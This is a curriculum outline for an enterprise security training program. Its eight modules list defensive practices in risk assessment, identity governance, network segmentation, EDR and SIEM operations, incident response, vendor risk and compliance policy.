Description

This curriculum spans the design and operationalization of enterprise security programs comparable to multi-workshop advisory engagements, covering threat modeling, identity governance, network segmentation, and incident response coordination as practiced in mature corporate security organizations.

Module 1: Threat Landscape Analysis and Risk Assessment

Conducting asset-criticality assessments to prioritize protection of systems supporting core business functions.
Selecting threat intelligence feeds based on industry relevance, data format compatibility, and integration effort with existing SIEM tools.
Defining risk appetite thresholds in collaboration with legal and executive stakeholders to guide security investment decisions.
Mapping attack vectors to MITRE ATT&CK framework for consistent threat modeling across business units.
Performing red team exercises with controlled scope to avoid disruption to production environments.
Updating risk registers quarterly to reflect changes in infrastructure, threat actors, and business strategy.

Module 2: Identity and Access Management Governance

Implementing role-based access control (RBAC) with periodic access recertification campaigns for compliance with SOX or HIPAA.
Negotiating MFA enforcement policies that balance security requirements with usability for remote and field employees.
Integrating on-premises Active Directory with cloud identity providers using hybrid federation models.
Establishing privileged access workflows that enforce just-in-time (JIT) access with session monitoring.
Managing service account lifecycle to prevent long-term static credentials in automated processes.
Enforcing access deprovisioning timelines following HR offboarding procedures.

Module 3: Network Security Architecture and Segmentation

Designing micro-segmentation policies in virtualized environments to limit lateral movement during breaches.
Deploying inline next-generation firewalls at data center egress points with performance impact testing.
Configuring DNS filtering rules to block access to known malicious domains without disrupting business operations.
Implementing VLAN isolation for guest, corporate, and OT networks with strict inter-VLAN routing rules.
Managing firewall rulebase hygiene through regular audits to eliminate shadowed or unused rules.
Evaluating SD-WAN security integration options when replacing legacy MPLS infrastructure.

Module 4: Endpoint Detection and Response (EDR) Operations

Selecting EDR agents based on OS coverage, telemetry depth, and endpoint performance overhead.
Creating custom detection rules to identify suspicious PowerShell or WMI activity in Windows environments.
Responding to high-fidelity alerts with disk and memory acquisition while preserving chain of custody.
Coordinating endpoint containment actions with IT operations to minimize business disruption.
Managing EDR console access with role-based permissions to prevent unauthorized policy changes.
Integrating EDR telemetry with SOAR platforms for automated enrichment and response workflows.

Module 5: Security Information and Event Management (SIEM) Implementation

Normalizing log formats from heterogeneous sources to enable correlation across network, endpoint, and cloud systems.
Designing retention policies that comply with regulatory requirements while managing storage costs.
Developing correlation rules to detect anomalous login patterns across geographies and time zones.
Onboarding cloud service logs (e.g., AWS CloudTrail, Azure AD) with appropriate IAM roles and API rate limits.
Validating log source uptime and parsing accuracy through continuous monitoring dashboards.
Responding to SIEM performance degradation by optimizing queries and adjusting data ingestion filters.

Module 6: Incident Response and Crisis Management

Activating incident response playbooks based on incident classification (e.g., ransomware, data exfiltration).
Coordinating communication between legal, PR, and technical teams during active breaches.
Preserving forensic evidence from compromised systems while maintaining business continuity.
Engaging third-party forensic firms under pre-negotiated contracts during major incidents.
Conducting tabletop exercises with executive leadership to test crisis decision-making.
Documenting post-incident timelines and root causes for regulatory reporting and internal review.

Module 7: Third-Party Risk and Supply Chain Security

Assessing vendor security posture through standardized questionnaires (e.g., SIG, CAIQ) and on-site audits.
Negotiating contractual clauses for breach notification timelines and liability allocation.
Monitoring third-party access to corporate systems with dedicated logging and alerting.
Requiring software bill of materials (SBOM) from critical vendors to assess open-source component risks.
Enforcing multi-factor authentication for all external partner access to shared environments.
Responding to supply chain compromises by isolating affected systems and validating software integrity.

Module 8: Security Policy Development and Compliance Alignment

Drafting acceptable use policies that define permitted and prohibited activities on corporate devices.
Aligning internal security controls with frameworks such as NIST CSF, ISO 27001, or CIS Controls.
Conducting gap assessments to identify control deficiencies prior to regulatory audits.
Updating policies to reflect changes in cloud adoption, remote work, or data residency laws.
Enforcing policy adherence through technical controls rather than relying solely on user training.
Documenting control exceptions with risk acceptance forms signed by business owners.